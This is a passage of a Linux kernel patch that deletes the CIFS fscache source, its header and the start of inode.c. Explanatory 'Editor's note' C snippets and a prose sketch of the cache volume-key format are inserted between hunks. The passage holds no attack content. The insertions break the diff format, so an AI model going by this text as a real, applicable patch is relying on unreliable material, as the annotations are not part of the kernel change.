+-		if (vcookie != ERR_PTR(-EBUSY)) {
+-			ret = PTR_ERR(vcookie);
+-			goto out_2;
+-		}
+-		pr_err("Cache volume key already in use (%s)\n", key);
+-		vcookie = NULL;
+-	}
+-
+-	tcon->fscache = vcookie;
+-	ret = 0;
+-out_2:
+-	kfree(key);
+-out:
+-	kfree(sharename);
+-	return ret;
+-}
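
The volume key is "cifs," plus the printed server address plus the
share name with any '/' replaced by ';'. A userspace sketch of the
construction (the address string is a made-up example; the kernel
formats the real one with %pISpc):

#include <stdio.h>
#include <string.h>

int main(void)
{
	char sharename[] = "share/subdir";
	char key[128];
	size_t i;

	for (i = 0; i < strlen(sharename); i++)
		if (sharename[i] == '/')
			sharename[i] = ';';

	snprintf(key, sizeof(key), "cifs,%s,%s", "192.168.1.10:445", sharename);
	puts(key);	/* cifs,192.168.1.10:445,share;subdir */
	return 0;
}
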
+-
+-void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon)
+-{
+-	struct cifs_fscache_volume_coherency_data cd;
+-
+-	cifs_dbg(FYI, "%s: (0x%p)\n", __func__, tcon->fscache);
+-
+-	cifs_fscache_fill_volume_coherency(tcon, &cd);
+-	fscache_relinquish_volume(tcon->fscache, &cd, false);
+-	tcon->fscache = NULL;
+-}
+-
+-void cifs_fscache_get_inode_cookie(struct inode *inode)
+-{
+-	struct cifs_fscache_inode_coherency_data cd;
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	cifs_fscache_fill_coherency(&cifsi->netfs.inode, &cd);
+-
+-	cifsi->netfs.cache =
+-		fscache_acquire_cookie(tcon->fscache, 0,
+-				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
+-				       &cd, sizeof(cd),
+-				       i_size_read(&cifsi->netfs.inode));
+-}
+-
+-void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update)
+-{
+-	if (update) {
+-		struct cifs_fscache_inode_coherency_data cd;
+-		loff_t i_size = i_size_read(inode);
+-
+-		cifs_fscache_fill_coherency(inode, &cd);
+-		fscache_unuse_cookie(cifs_inode_cookie(inode), &cd, &i_size);
+-	} else {
+-		fscache_unuse_cookie(cifs_inode_cookie(inode), NULL, NULL);
+-	}
+-}
+-
+-void cifs_fscache_release_inode_cookie(struct inode *inode)
+-{
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-
+-	if (cookie) {
+-		cifs_dbg(FYI, "%s: (0x%p)\n", __func__, cookie);
+-		fscache_relinquish_cookie(cookie, false);
+-		cifsi->netfs.cache = NULL;
+-	}
+-}
+-
+-/*
+- * Fallback page reading interface.
+- */
+-static int fscache_fallback_read_page(struct inode *inode, struct page *page)
+-{
+-	struct netfs_cache_resources cres;
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-	struct iov_iter iter;
+-	struct bio_vec bvec[1];
+-	int ret;
+-
+-	memset(&cres, 0, sizeof(cres));
+-	bvec[0].bv_page		= page;
+-	bvec[0].bv_offset	= 0;
+-	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+-
+-	ret = fscache_begin_read_operation(&cres, cookie);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = fscache_read(&cres, page_offset(page), &iter, NETFS_READ_HOLE_FAIL,
+-			   NULL, NULL);
+-	fscache_end_operation(&cres);
+-	return ret;
+-}
+-
+-/*
+- * Fallback page writing interface.
+- */
+-static int fscache_fallback_write_page(struct inode *inode, struct page *page,
+-				       bool no_space_allocated_yet)
+-{
+-	struct netfs_cache_resources cres;
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-	struct iov_iter iter;
+-	struct bio_vec bvec[1];
+-	loff_t start = page_offset(page);
+-	size_t len = PAGE_SIZE;
+-	int ret;
+-
+-	memset(&cres, 0, sizeof(cres));
+-	bvec[0].bv_page		= page;
+-	bvec[0].bv_offset	= 0;
+-	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+-
+-	ret = fscache_begin_write_operation(&cres, cookie);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = cres.ops->prepare_write(&cres, &start, &len, i_size_read(inode),
+-				      no_space_allocated_yet);
+-	if (ret == 0)
+-		ret = fscache_write(&cres, page_offset(page), &iter, NULL, NULL);
+-	fscache_end_operation(&cres);
+-	return ret;
+-}
+-
+-/*
+- * Retrieve a page from FS-Cache
+- */
+-int __cifs_readpage_from_fscache(struct inode *inode, struct page *page)
+-{
+-	int ret;
+-
+-	cifs_dbg(FYI, "%s: (fsc:%p, p:%p, i:0x%p\n",
+-		 __func__, cifs_inode_cookie(inode), page, inode);
+-
+-	ret = fscache_fallback_read_page(inode, page);
+-	if (ret < 0)
+-		return ret;
+-
+-	/* Read completed synchronously */
+-	SetPageUptodate(page);
+-	return 0;
+-}
+-
+-void __cifs_readpage_to_fscache(struct inode *inode, struct page *page)
+-{
+-	cifs_dbg(FYI, "%s: (fsc: %p, p: %p, i: %p)\n",
+-		 __func__, cifs_inode_cookie(inode), page, inode);
+-
+-	fscache_fallback_write_page(inode, page, true);
+-}
+-
+-/*
+- * Query the cache occupancy.
+- */
+-int __cifs_fscache_query_occupancy(struct inode *inode,
+-				   pgoff_t first, unsigned int nr_pages,
+-				   pgoff_t *_data_first,
+-				   unsigned int *_data_nr_pages)
+-{
+-	struct netfs_cache_resources cres;
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-	loff_t start, data_start;
+-	size_t len, data_len;
+-	int ret;
+-
+-	ret = fscache_begin_read_operation(&cres, cookie);
+-	if (ret < 0)
+-		return ret;
+-
+-	start = first * PAGE_SIZE;
+-	len = nr_pages * PAGE_SIZE;
+-	ret = cres.ops->query_occupancy(&cres, start, len, PAGE_SIZE,
+-					&data_start, &data_len);
+-	if (ret == 0) {
+-		*_data_first = data_start / PAGE_SIZE;
+-		*_data_nr_pages = len / PAGE_SIZE;
+-	}
+-
+-	fscache_end_operation(&cres);
+-	return ret;
+-}
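/*
 * Editor's note: an illustrative sketch, not part of the patch above.
 * The deleted __cifs_fscache_query_occupancy() converts between byte
 * ranges and page indices when asking the cache what it holds. A
 * minimal user-space model of that arithmetic (the PAGE_SIZE value is
 * an assumption for the demo):
 */
#include <stdio.h>

#define PAGE_SIZE 4096UL

int main(void)
{
	unsigned long first = 3, nr_pages = 8;        /* requested page window */
	unsigned long start = first * PAGE_SIZE;      /* byte offset of window */
	unsigned long len = nr_pages * PAGE_SIZE;     /* byte length of window */
	unsigned long data_start = start + PAGE_SIZE; /* pretend data begins one page in */

	/* back to page units, as the deleted helper did on success */
	printf("first data page: %lu\n", data_start / PAGE_SIZE);
	printf("pages queried:   %lu\n", len / PAGE_SIZE);
	return 0;
}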
+diff --git a/fs/cifs/fscache.h b/fs/cifs/fscache.h
+deleted file mode 100644
+index 67b601041f0a3..0000000000000
+--- a/fs/cifs/fscache.h
++++ /dev/null
+@@ -1,148 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *   CIFS filesystem cache interface definitions
+- *
+- *   Copyright (c) 2010 Novell, Inc.
+- *   Author(s): Suresh Jayaraman <sjayaraman@suse.de>
+- *
+- */
+-#ifndef _CIFS_FSCACHE_H
+-#define _CIFS_FSCACHE_H
+-
+-#include <linux/swap.h>
+-#include <linux/fscache.h>
+-
+-#include "cifsglob.h"
+-
+-/*
+- * Coherency data attached to CIFS volume within the cache
+- */
+-struct cifs_fscache_volume_coherency_data {
+-	__le64	resource_id;		/* unique server resource id */
+-	__le64	vol_create_time;
+-	__le32	vol_serial_number;
+-} __packed;
+-
+-/*
+- * Coherency data attached to CIFS inode within the cache.
+- */
+-struct cifs_fscache_inode_coherency_data {
+-	__le64 last_write_time_sec;
+-	__le64 last_change_time_sec;
+-	__le32 last_write_time_nsec;
+-	__le32 last_change_time_nsec;
+-};
+-
+-#ifdef CONFIG_CIFS_FSCACHE
+-
+-/*
+- * fscache.c
+- */
+-extern int cifs_fscache_get_super_cookie(struct cifs_tcon *);
+-extern void cifs_fscache_release_super_cookie(struct cifs_tcon *);
+-
+-extern void cifs_fscache_get_inode_cookie(struct inode *inode);
+-extern void cifs_fscache_release_inode_cookie(struct inode *);
+-extern void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update);
+-
+-static inline
+-void cifs_fscache_fill_coherency(struct inode *inode,
+-				 struct cifs_fscache_inode_coherency_data *cd)
+-{
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-
+-	memset(cd, 0, sizeof(*cd));
+-	cd->last_write_time_sec   = cpu_to_le64(cifsi->netfs.inode.i_mtime.tv_sec);
+-	cd->last_write_time_nsec  = cpu_to_le32(cifsi->netfs.inode.i_mtime.tv_nsec);
+-	cd->last_change_time_sec  = cpu_to_le64(cifsi->netfs.inode.i_ctime.tv_sec);
+-	cd->last_change_time_nsec = cpu_to_le32(cifsi->netfs.inode.i_ctime.tv_nsec);
+-}
+-
+-
+-static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode)
+-{
+-	return netfs_i_cookie(&CIFS_I(inode)->netfs);
+-}
+-
+-static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags)
+-{
+-	struct cifs_fscache_inode_coherency_data cd;
+-
+-	cifs_fscache_fill_coherency(inode, &cd);
+-	fscache_invalidate(cifs_inode_cookie(inode), &cd,
+-			   i_size_read(inode), flags);
+-}
+-
+-extern int __cifs_fscache_query_occupancy(struct inode *inode,
+-					  pgoff_t first, unsigned int nr_pages,
+-					  pgoff_t *_data_first,
+-					  unsigned int *_data_nr_pages);
+-
+-static inline int cifs_fscache_query_occupancy(struct inode *inode,
+-					       pgoff_t first, unsigned int nr_pages,
+-					       pgoff_t *_data_first,
+-					       unsigned int *_data_nr_pages)
+-{
+-	if (!cifs_inode_cookie(inode))
+-		return -ENOBUFS;
+-	return __cifs_fscache_query_occupancy(inode, first, nr_pages,
+-					      _data_first, _data_nr_pages);
+-}
+-
+-extern int __cifs_readpage_from_fscache(struct inode *pinode, struct page *ppage);
+-extern void __cifs_readpage_to_fscache(struct inode *pinode, struct page *ppage);
+-
+-
+-static inline int cifs_readpage_from_fscache(struct inode *inode,
+-					     struct page *page)
+-{
+-	if (cifs_inode_cookie(inode))
+-		return __cifs_readpage_from_fscache(inode, page);
+-	return -ENOBUFS;
+-}
+-
+-static inline void cifs_readpage_to_fscache(struct inode *inode,
+-					    struct page *page)
+-{
+-	if (cifs_inode_cookie(inode))
+-		__cifs_readpage_to_fscache(inode, page);
+-}
+-
+-#else /* CONFIG_CIFS_FSCACHE */
+-static inline
+-void cifs_fscache_fill_coherency(struct inode *inode,
+-				 struct cifs_fscache_inode_coherency_data *cd)
+-{
+-}
+-
+-static inline int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon) { return 0; }
+-static inline void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon) {}
+-
+-static inline void cifs_fscache_get_inode_cookie(struct inode *inode) {}
+-static inline void cifs_fscache_release_inode_cookie(struct inode *inode) {}
+-static inline void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update) {}
+-static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode) { return NULL; }
+-static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags) {}
+-
+-static inline int cifs_fscache_query_occupancy(struct inode *inode,
+-					       pgoff_t first, unsigned int nr_pages,
+-					       pgoff_t *_data_first,
+-					       unsigned int *_data_nr_pages)
+-{
+-	*_data_first = ULONG_MAX;
+-	*_data_nr_pages = 0;
+-	return -ENOBUFS;
+-}
+-
+-static inline int
+-cifs_readpage_from_fscache(struct inode *inode, struct page *page)
+-{
+-	return -ENOBUFS;
+-}
+-
+-static inline
+-void cifs_readpage_to_fscache(struct inode *inode, struct page *page) {}
+-
+-#endif /* CONFIG_CIFS_FSCACHE */
+-
+-#endif /* _CIFS_FSCACHE_H */
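/*
 * Editor's note: a hedged, self-contained sketch of the header's
 * #ifdef pattern, not patch content. When the feature is compiled out,
 * static inline no-op stubs keep every caller building unchanged;
 * DEMO_FEATURE below is a stand-in for CONFIG_CIFS_FSCACHE.
 */
#include <stdio.h>

#define DEMO_FEATURE 0

#if DEMO_FEATURE
static inline int feature_get_cookie(void) { return 42; } /* real work */
#else
static inline int feature_get_cookie(void) { return 0; }  /* no-op stub */
#endif

int main(void)
{
	/* the call site is identical either way; only the stub body changes */
	printf("cookie: %d\n", feature_get_cookie());
	return 0;
}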
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+deleted file mode 100644
+index 8901d884f5b98..0000000000000
+--- a/fs/cifs/inode.c
++++ /dev/null
+@@ -1,3093 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2010
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <linux/freezer.h>
+-#include <linux/sched/signal.h>
+-#include <linux/wait_bit.h>
+-#include <linux/fiemap.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fscache.h"
+-#include "fs_context.h"
+-#include "cifs_ioctl.h"
+-#include "cached_dir.h"
+-
+-static void cifs_set_ops(struct inode *inode)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	switch (inode->i_mode & S_IFMT) {
+-	case S_IFREG:
+-		inode->i_op = &cifs_file_inode_ops;
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
+-			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-				inode->i_fop = &cifs_file_direct_nobrl_ops;
+-			else
+-				inode->i_fop = &cifs_file_direct_ops;
+-		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
+-			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-				inode->i_fop = &cifs_file_strict_nobrl_ops;
+-			else
+-				inode->i_fop = &cifs_file_strict_ops;
+-		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-			inode->i_fop = &cifs_file_nobrl_ops;
+-		else { /* not direct, send byte range locks */
+-			inode->i_fop = &cifs_file_ops;
+-		}
+-
+-		/* check if server can support readahead */
+-		if (cifs_sb_master_tcon(cifs_sb)->ses->server->max_read <
+-				PAGE_SIZE + MAX_CIFS_HDR_SIZE)
+-			inode->i_data.a_ops = &cifs_addr_ops_smallbuf;
+-		else
+-			inode->i_data.a_ops = &cifs_addr_ops;
+-		break;
+-	case S_IFDIR:
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-		if (IS_AUTOMOUNT(inode)) {
+-			inode->i_op = &cifs_dfs_referral_inode_operations;
+-		} else {
+-#else /* NO DFS support, treat as a directory */
+-		{
+-#endif
+-			inode->i_op = &cifs_dir_inode_ops;
+-			inode->i_fop = &cifs_dir_ops;
+-		}
+-		break;
+-	case S_IFLNK:
+-		inode->i_op = &cifs_symlink_inode_ops;
+-		break;
+-	default:
+-		init_special_inode(inode, inode->i_mode, inode->i_rdev);
+-		break;
+-	}
+-}
+-
+-/* check inode attributes against fattr. If they don't match, tag the
+- * inode for cache invalidation
+- */
+-static void
+-cifs_revalidate_cache(struct inode *inode, struct cifs_fattr *fattr)
+-{
+-	struct cifs_fscache_inode_coherency_data cd;
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-
+-	cifs_dbg(FYI, "%s: revalidating inode %llu\n",
+-		 __func__, cifs_i->uniqueid);
+-
+-	if (inode->i_state & I_NEW) {
+-		cifs_dbg(FYI, "%s: inode %llu is new\n",
+-			 __func__, cifs_i->uniqueid);
+-		return;
+-	}
+-
+-	/* don't bother with revalidation if we have an oplock */
+-	if (CIFS_CACHE_READ(cifs_i)) {
+-		cifs_dbg(FYI, "%s: inode %llu is oplocked\n",
+-			 __func__, cifs_i->uniqueid);
+-		return;
+-	}
+-
+-	 /* revalidate if mtime or size have changed */
+-	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
+-	if (timespec64_equal(&inode->i_mtime, &fattr->cf_mtime) &&
+-	    cifs_i->server_eof == fattr->cf_eof) {
+-		cifs_dbg(FYI, "%s: inode %llu is unchanged\n",
+-			 __func__, cifs_i->uniqueid);
+-		return;
+-	}
+-
+-	cifs_dbg(FYI, "%s: invalidating inode %llu mapping\n",
+-		 __func__, cifs_i->uniqueid);
+-	set_bit(CIFS_INO_INVALID_MAPPING, &cifs_i->flags);
+-	/* Invalidate fscache cookie */
+-	cifs_fscache_fill_coherency(&cifs_i->netfs.inode, &cd);
+-	fscache_invalidate(cifs_inode_cookie(inode), &cd, i_size_read(inode), 0);
+-}
+-
+-/*
+- * copy nlink to the inode, unless it wasn't provided.  Provide
+- * sane values if we don't have an existing one and none was provided
+- */
+-static void
+-cifs_nlink_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
+-{
+-	/*
+-	 * if we're in a situation where we can't trust what we
+-	 * got from the server (readdir, some non-unix cases)
+-	 * fake reasonable values
+-	 */
+-	if (fattr->cf_flags & CIFS_FATTR_UNKNOWN_NLINK) {
+-		/* only provide fake values on a new inode */
+-		if (inode->i_state & I_NEW) {
+-			if (fattr->cf_cifsattrs & ATTR_DIRECTORY)
+-				set_nlink(inode, 2);
+-			else
+-				set_nlink(inode, 1);
+-		}
+-		return;
+-	}
+-
+-	/* we trust the server, so update it */
+-	set_nlink(inode, fattr->cf_nlink);
+-}
+-
+-/* populate an inode with info from a cifs_fattr struct */
+-int
+-cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
+-{
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	if (!(inode->i_state & I_NEW) &&
+-	    unlikely(inode_wrong_type(inode, fattr->cf_mode))) {
+-		CIFS_I(inode)->time = 0; /* force reval */
+-		return -ESTALE;
+-	}
+-
+-	cifs_revalidate_cache(inode, fattr);
+-
+-	spin_lock(&inode->i_lock);
+-	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
+-	fattr->cf_atime = timestamp_truncate(fattr->cf_atime, inode);
+-	fattr->cf_ctime = timestamp_truncate(fattr->cf_ctime, inode);
+-	/* we do not want atime to be less than mtime, it broke some apps */
+-	if (timespec64_compare(&fattr->cf_atime, &fattr->cf_mtime) < 0)
+-		inode->i_atime = fattr->cf_mtime;
+-	else
+-		inode->i_atime = fattr->cf_atime;
+-	inode->i_mtime = fattr->cf_mtime;
+-	inode->i_ctime = fattr->cf_ctime;
+-	inode->i_rdev = fattr->cf_rdev;
+-	cifs_nlink_fattr_to_inode(inode, fattr);
+-	inode->i_uid = fattr->cf_uid;
+-	inode->i_gid = fattr->cf_gid;
+-
+-	/* if dynperm is set, don't clobber existing mode */
+-	if (inode->i_state & I_NEW ||
+-	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM))
+-		inode->i_mode = fattr->cf_mode;
+-
+-	cifs_i->cifsAttrs = fattr->cf_cifsattrs;
+-
+-	if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
+-		cifs_i->time = 0;
+-	else
+-		cifs_i->time = jiffies;
+-
+-	if (fattr->cf_flags & CIFS_FATTR_DELETE_PENDING)
+-		set_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
+-	else
+-		clear_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
+-
+-	cifs_i->server_eof = fattr->cf_eof;
+-	/*
+-	 * Can't safely change the file size here if the client is writing to
+-	 * it due to potential races.
+-	 */
+-	if (is_size_safe_to_change(cifs_i, fattr->cf_eof)) {
+-		i_size_write(inode, fattr->cf_eof);
+-
+-		/*
+-		 * i_blocks is not related to (i_size / i_blksize),
+-		 * but instead 512 byte (2**9) size is required for
+-		 * calculating num blocks.
+-		 */
+-		inode->i_blocks = (512 - 1 + fattr->cf_bytes) >> 9;
+-	}
+-
+-	if (S_ISLNK(fattr->cf_mode)) {
+-		kfree(cifs_i->symlink_target);
+-		cifs_i->symlink_target = fattr->cf_symlink_target;
+-		fattr->cf_symlink_target = NULL;
+-	}
+-	spin_unlock(&inode->i_lock);
+-
+-	if (fattr->cf_flags & CIFS_FATTR_DFS_REFERRAL)
+-		inode->i_flags |= S_AUTOMOUNT;
+-	if (inode->i_state & I_NEW)
+-		cifs_set_ops(inode);
+-	return 0;
+-}
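/*
 * Editor's note: illustration only. cifs_fattr_to_inode() above derives
 * i_blocks in 512-byte sectors via (512 - 1 + bytes) >> 9, which is a
 * round-up divide by 512. A standalone check of that identity:
 */
#include <stdio.h>

int main(void)
{
	unsigned long long sizes[] = { 0, 1, 511, 512, 513, 4096 };
	unsigned int i;

	for (i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++) {
		unsigned long long b = sizes[i];
		/* same expression as the deleted code */
		printf("%llu bytes -> %llu sectors\n", b, (512 - 1 + b) >> 9);
	}
	return 0;
}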
+-
+-void
+-cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
+-		return;
+-
+-	fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-}
+-
+-/* Fill a cifs_fattr struct with info from FILE_UNIX_BASIC_INFO. */
+-void
+-cifs_unix_basic_to_fattr(struct cifs_fattr *fattr, FILE_UNIX_BASIC_INFO *info,
+-			 struct cifs_sb_info *cifs_sb)
+-{
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_uniqueid = le64_to_cpu(info->UniqueId);
+-	fattr->cf_bytes = le64_to_cpu(info->NumOfBytes);
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-
+-	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastModificationTime);
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->LastStatusChange);
+-	/* old POSIX extensions don't get create time */
+-
+-	fattr->cf_mode = le64_to_cpu(info->Permissions);
+-
+-	/*
+-	 * Since we set the inode type below we need to mask off
+-	 * to avoid strange results if bits set above.
+-	 */
+-	fattr->cf_mode &= ~S_IFMT;
+-	switch (le32_to_cpu(info->Type)) {
+-	case UNIX_FILE:
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-		break;
+-	case UNIX_SYMLINK:
+-		fattr->cf_mode |= S_IFLNK;
+-		fattr->cf_dtype = DT_LNK;
+-		break;
+-	case UNIX_DIR:
+-		fattr->cf_mode |= S_IFDIR;
+-		fattr->cf_dtype = DT_DIR;
+-		break;
+-	case UNIX_CHARDEV:
+-		fattr->cf_mode |= S_IFCHR;
+-		fattr->cf_dtype = DT_CHR;
+-		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
+-				       le64_to_cpu(info->DevMinor) & MINORMASK);
+-		break;
+-	case UNIX_BLOCKDEV:
+-		fattr->cf_mode |= S_IFBLK;
+-		fattr->cf_dtype = DT_BLK;
+-		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
+-				       le64_to_cpu(info->DevMinor) & MINORMASK);
+-		break;
+-	case UNIX_FIFO:
+-		fattr->cf_mode |= S_IFIFO;
+-		fattr->cf_dtype = DT_FIFO;
+-		break;
+-	case UNIX_SOCKET:
+-		fattr->cf_mode |= S_IFSOCK;
+-		fattr->cf_dtype = DT_SOCK;
+-		break;
+-	default:
+-		/* safest to call it a file if we do not know */
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-		cifs_dbg(FYI, "unknown type %d\n", le32_to_cpu(info->Type));
+-		break;
+-	}
+-
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)) {
+-		u64 id = le64_to_cpu(info->Uid);
+-		if (id < ((uid_t)-1)) {
+-			kuid_t uid = make_kuid(&init_user_ns, id);
+-			if (uid_valid(uid))
+-				fattr->cf_uid = uid;
+-		}
+-	}
+-
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)) {
+-		u64 id = le64_to_cpu(info->Gid);
+-		if (id < ((gid_t)-1)) {
+-			kgid_t gid = make_kgid(&init_user_ns, id);
+-			if (gid_valid(gid))
+-				fattr->cf_gid = gid;
+-		}
+-	}
+-
+-	fattr->cf_nlink = le64_to_cpu(info->Nlinks);
+-}
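/*
 * Editor's note: sketch, not patch content. The converter above masks
 * S_IFMT off the server-supplied permissions before OR-ing in the type
 * bit chosen from info->Type, so stray type bits cannot leak through.
 * The masking step in isolation:
 */
#include <stdio.h>
#include <sys/stat.h>

int main(void)
{
	mode_t mode = 0100644;   /* server sent type and permission bits together */

	mode &= ~S_IFMT;         /* keep only the permission bits */
	mode |= S_IFREG;         /* then set the type we decided on */

	printf("mode: 0%o (regular file: %s)\n",
	       (unsigned int)mode, S_ISREG(mode) ? "yes" : "no");
	return 0;
}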
+-
+-/*
+- * Fill a cifs_fattr struct with fake inode info.
+- *
+- * Needed to setup cifs_fattr data for the directory which is the
+- * junction to the new submount (ie to setup the fake directory
+- * which represents a DFS referral).
+- */
+-static void
+-cifs_create_dfs_fattr(struct cifs_fattr *fattr, struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	cifs_dbg(FYI, "creating fake fattr for DFS referral\n");
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_mode = S_IFDIR | S_IXUGO | S_IRWXU;
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-	ktime_get_coarse_real_ts64(&fattr->cf_mtime);
+-	fattr->cf_atime = fattr->cf_ctime = fattr->cf_mtime;
+-	fattr->cf_nlink = 2;
+-	fattr->cf_flags = CIFS_FATTR_DFS_REFERRAL;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_get_file_info_unix(struct file *filp)
+-{
+-	int rc;
+-	unsigned int xid;
+-	FILE_UNIX_BASIC_INFO find_data;
+-	struct cifs_fattr fattr = {};
+-	struct inode *inode = file_inode(filp);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsFileInfo *cfile = filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-
+-	xid = get_xid();
+-
+-	if (cfile->symlink_target) {
+-		fattr.cf_symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-		if (!fattr.cf_symlink_target) {
+-			rc = -ENOMEM;
+-			goto cifs_gfiunix_out;
+-		}
+-	}
+-
+-	rc = CIFSSMBUnixQFileInfo(xid, tcon, cfile->fid.netfid, &find_data);
+-	if (!rc) {
+-		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
+-	} else if (rc == -EREMOTE) {
+-		cifs_create_dfs_fattr(&fattr, inode->i_sb);
+-		rc = 0;
+-	} else
+-		goto cifs_gfiunix_out;
+-
+-	rc = cifs_fattr_to_inode(inode, &fattr);
+-
+-cifs_gfiunix_out:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_get_inode_info_unix(struct inode **pinode,
+-			     const unsigned char *full_path,
+-			     struct super_block *sb, unsigned int xid)
+-{
+-	int rc;
+-	FILE_UNIX_BASIC_INFO find_data;
+-	struct cifs_fattr fattr;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	cifs_dbg(FYI, "Getting info on %s\n", full_path);
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	/* could have done a find first instead but this returns more info */
+-	rc = CIFSSMBUnixQPathInfo(xid, tcon, full_path, &find_data,
+-				  cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	cifs_dbg(FYI, "%s: query path info: rc = %d\n", __func__, rc);
+-	cifs_put_tlink(tlink);
+-
+-	if (!rc) {
+-		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
+-	} else if (rc == -EREMOTE) {
+-		cifs_create_dfs_fattr(&fattr, sb);
+-		rc = 0;
+-	} else {
+-		return rc;
+-	}
+-
+-	/* check for Minshall+French symlinks */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
+-		int tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
+-					     full_path);
+-		if (tmprc)
+-			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
+-	}
+-
+-	if (S_ISLNK(fattr.cf_mode) && !fattr.cf_symlink_target) {
+-		if (!server->ops->query_symlink)
